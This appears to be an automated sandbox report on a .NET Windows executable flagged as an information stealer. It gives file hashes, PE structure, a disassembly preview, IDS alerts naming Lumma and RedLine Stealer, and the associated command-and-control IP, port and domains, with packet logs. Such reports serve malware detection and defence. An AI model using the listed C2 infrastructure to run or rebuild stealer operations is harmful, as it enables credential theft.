Preview:	.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...\|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..\|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......\|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..\|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.029850019387454
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	1Vkf7silOj.exe
File size:	304'128 bytes
MD5:	cd581d68ed550455444ee6e099c44266
SHA1:	f131d587578336651fd3e325b82b6c185a4b6429
SHA256:	a2ebb4bbf2ae4f7755b3ab604996e6c7e570ac8837ca544854ed696a81972505
SHA512:	33f94920032436cd45906c27cd5b39f47f9519ab5a1a6745bd8a69d81ce729d8e5e425a7538b5f4f6992bd3804e0376085f5da1c28cf9f4d664cabe64036d0b5
SSDEEP:	3072:xqFFrqwIOGBHy9MGSwTc425F7dw4AhTiNhdSCTZifjIxcZqf7D34leqiOLCbBOu:QBIOGf4259dnTZcscZqf7DIvL
TLSH:	95545B1873E89910E53F4F799471D6B093B0EC12A857E31A5ED0AC7B3D36B40EA15BB2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	4d8ea38d85a38e6d

Static PE Info

General

Entrypoint:	0x429fca
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB6CE1FF5 [Thu Mar 10 05:51:49 2067 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
popad
add byte ptr [ebp+00h], dh
je 00007FDB99065F02h
outsd
add byte ptr [esi+00h], ah
imul eax, dword ptr [eax], 006C006Ch
xor eax, 59007400h
add byte ptr [edi+00h], dl
push edx
add byte ptr [ecx+00h], dh
popad
add byte ptr [edi+00h], dl
push esi
add byte ptr [edi+00h], ch
popad
add byte ptr [ebp+00h], ch
push 61006800h
add byte ptr [ebp+00h], ch
dec edx
add byte ptr [eax], bh
add byte ptr [edi+00h], dl
push edi
add byte ptr [ecx], bh
add byte ptr [ecx+00h], bh
bound eax, dword ptr [eax]
xor al, byte ptr [eax]
insb
add byte ptr [eax+00h], bl
pop ecx
add byte ptr [edi+00h], dl
js 00007FDB99065F02h
jnc 00007FDB99065F02h
pop edx
add byte ptr [eax+00h], bl
push ecx
add byte ptr [ebx+00h], cl
popad
add byte ptr [edi+00h], dl
dec edx
add byte ptr [ebp+00h], dh
pop edx
add byte ptr [edi+00h], dl
jo 00007FDB99065F02h
imul eax, dword ptr [eax], 5Ah
add byte ptr [ebp+00h], ch
jo 00007FDB99065F02h
je 00007FDB99065F02h
bound eax, dword ptr [eax]
push edi
add byte ptr [eax+eax+77h], dh
add byte ptr [ecx+00h], bl
xor al, byte ptr [eax]
xor eax, 63007300h
add byte ptr [edi+00h], al
push esi
add byte ptr [ecx+00h], ch
popad
add byte ptr [edx], dh
add byte ptr [eax+00h], bh
je 00007FDB99065F02h
bound eax, dword ptr [eax]
insd
add byte ptr [eax+eax+76h], dh
add byte ptr [edx+00h], bl
push edi
add byte ptr [ecx], bh
add byte ptr [eax+00h], dh
popad
add byte ptr [edi+00h], al
cmp dword ptr [eax], eax
insd
add byte ptr [edx+00h], bl
push edi
add byte ptr [esi+00h], cl
cmp byte ptr [eax], al
push esi
add byte ptr [eax+00h], cl
dec edx
add byte ptr [esi+00h], dh
bound eax, dword ptr [eax]
insd
add byte ptr [eax+00h], bh
jo 00007FDB99065F02h
bound eax, dword ptr [eax]
insd
add byte ptr [ebx+00h], dh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x29f78	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x30000	0x1c9d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x29f5c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2cfb0	0x2d000	1ef650fe8a3b3a16e5d985bbd48dc149	False	0.46170247395833336	data	6.168890391861732	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x30000	0x1c9d4	0x1cc00	2a107436d09ee8dab503ebab751805e9	False	0.2372367527173913	data	2.606299738657661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4e000	0xc	0x400	0514dd853850a28521281b58cd25ce98	False	0.025390625	data	0.05585530805374581	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x301a0	0x3d04	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9934058898847631
RT_ICON	0x33eb4	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m	0.09013072282030049
RT_ICON	0x446ec	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m	0.13905290505432216
RT_ICON	0x48924	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m	0.17033195020746889
RT_ICON	0x4aedc	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m	0.2045028142589118
RT_ICON	0x4bf94	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m	0.24645390070921985
RT_GROUP_ICON	0x4c40c	0x5a	data	0.7666666666666667
RT_VERSION	0x4c478	0x35a	data	0.4417249417249417
RT_MANIFEST	0x4c7e4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/27/24-05:58:37.704225	UDP	2053754	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (facilitycoursedw .shop)	53318	53	192.168.2.7	1.1.1.1
06/27/24-05:58:37.729906	UDP	2053762	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (computerexcudesp .shop)	57525	53	192.168.2.7	1.1.1.1
06/27/24-05:58:15.515792	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	40960	49707	185.215.113.67	192.168.2.7
06/27/24-05:58:37.777945	UDP	2053764	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (disappointcredisotw .shop)	57877	53	192.168.2.7	1.1.1.1
06/27/24-05:58:37.718326	UDP	2053752	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (publicitycharetew .shop)	63750	53	192.168.2.7	1.1.1.1
06/27/24-05:58:20.860334	TCP	2046056	ET TROJAN Redline Stealer/MetaStealer Family Activity (Response)	40960	49707	185.215.113.67	192.168.2.7
06/27/24-05:58:37.765217	UDP	2053756	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (bargainnygroandjwk .shop)	64031	53	192.168.2.7	1.1.1.1
06/27/24-05:58:37.789371	UDP	2053750	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (doughtdrillyksow .shop)	56103	53	192.168.2.7	1.1.1.1
06/27/24-05:58:37.751929	UDP	2053758	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (injurypiggyoewirog .shop)	59643	53	192.168.2.7	1.1.1.1
06/27/24-05:58:15.193395	TCP	2046045	ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	49707	40960	192.168.2.7	185.215.113.67
06/27/24-05:58:29.559593	TCP	2043231	ET TROJAN Redline Stealer TCP CnC Activity	49707	40960	192.168.2.7	185.215.113.67
06/27/24-05:58:37.741678	UDP	2053760	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (leafcalfconflcitw .shop)	56934	53	192.168.2.7	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 27, 2024 05:58:08.702811003 CEST	49677	443	192.168.2.7	20.50.201.200
Jun 27, 2024 05:58:09.084988117 CEST	49677	443	192.168.2.7	20.50.201.200
Jun 27, 2024 05:58:09.444490910 CEST	49671	443	192.168.2.7	204.79.197.203
Jun 27, 2024 05:58:09.835006952 CEST	49677	443	192.168.2.7	20.50.201.200
Jun 27, 2024 05:58:10.319338083 CEST	49674	443	192.168.2.7	104.98.116.138
Jun 27, 2024 05:58:10.321346998 CEST	49675	443	192.168.2.7	104.98.116.138
Jun 27, 2024 05:58:10.428761959 CEST	49672	443	192.168.2.7	104.98.116.138
Jun 27, 2024 05:58:11.334984064 CEST	49677	443	192.168.2.7	20.50.201.200
Jun 27, 2024 05:58:14.290172100 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:14.295145035 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:14.295227051 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:14.318201065 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:14.319386005 CEST	49677	443	192.168.2.7	20.50.201.200
Jun 27, 2024 05:58:14.323940039 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:15.158546925 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:15.193394899 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:15.198411942 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:15.515791893 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:15.569493055 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:19.053832054 CEST	49671	443	192.168.2.7	204.79.197.203
Jun 27, 2024 05:58:19.928778887 CEST	49674	443	192.168.2.7	104.98.116.138
Jun 27, 2024 05:58:19.928929090 CEST	49675	443	192.168.2.7	104.98.116.138
Jun 27, 2024 05:58:20.038207054 CEST	49672	443	192.168.2.7	104.98.116.138
Jun 27, 2024 05:58:20.272656918 CEST	49677	443	192.168.2.7	20.50.201.200
Jun 27, 2024 05:58:20.557931900 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:20.562954903 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:20.860333920 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:20.860378981 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:20.860394001 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:20.860409021 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:20.860425949 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:20.860526085 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:20.860785007 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:20.947962999 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:20.947985888 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:20.948107004 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.067207098 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.116276026 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.198894978 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.203756094 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.507322073 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.553881884 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.579507113 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.584459066 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.584498882 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.584511995 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.584536076 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.584548950 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.584561110 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.584563971 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.584573030 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.584635019 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.584657907 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.584700108 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.584753990 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.584758043 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.584769964 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.584811926 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.584836006 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.589375019 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.589473009 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.589523077 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.589564085 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.589577913 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.589587927 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.589615107 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.589639902 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.589658976 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.589673042 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.589684963 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.589713097 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.589750051 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.589771032 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.589843988 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.589879990 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.589893103 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.589950085 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.589989901 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.590002060 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.590013981 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.590045929 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.590087891 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.594450951 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594463110 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594507933 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.594540119 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594542027 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.594566107 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594598055 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594599962 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.594623089 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.594660044 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.594666958 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594719887 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.594722033 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594773054 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594777107 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.594805002 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594818115 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594825983 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.594840050 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594850063 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.594876051 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.594899893 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.594904900 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594918013 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594935894 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594948053 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.594964027 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.595026970 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.595040083 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.595065117 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.595077038 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.595077038 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.595094919 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.595097065 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.595119953 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.595122099 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.595153093 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.595154047 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.595181942 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.595201015 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.595212936 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.595213890 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.595241070 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.595242023 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.595256090 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.595264912 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.595269918 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.595282078 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.595304966 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.595320940 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.595387936 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.599319935 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599375963 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.599410057 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599426031 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599459887 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599474907 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599483013 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.599497080 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.599509001 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599520922 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599545002 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.599570036 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599585056 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599601030 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599615097 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.599623919 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599663019 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599668026 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.599675894 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599771023 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599783897 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599802017 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599813938 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599837065 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599849939 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599941015 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599953890 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599967957 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.599981070 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600006104 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600023031 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600064993 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600117922 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600131035 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600194931 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600207090 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600220919 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600259066 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600270987 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600331068 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600343943 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600393057 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600405931 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600420952 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600492954 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600511074 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600553989 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600567102 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600593090 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600605965 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600621939 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.600629091 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600644112 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600667953 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600681067 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600686073 CEST	49707	40960	192.168.2.7	185.215.113.67
Jun 27, 2024 05:58:21.600693941 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600704908 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600729942 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600742102 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600754023 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600769043 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600781918 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600792885 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600826025 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600838900 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600851059 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600862980 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600874901 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600898981 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600910902 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600923061 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600935936 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600955009 CEST	40960	49707	185.215.113.67	192.168.2.7
Jun 27, 2024 05:58:21.600966930 CEST	40960	49707	185.215.113.67	192.168.2.7
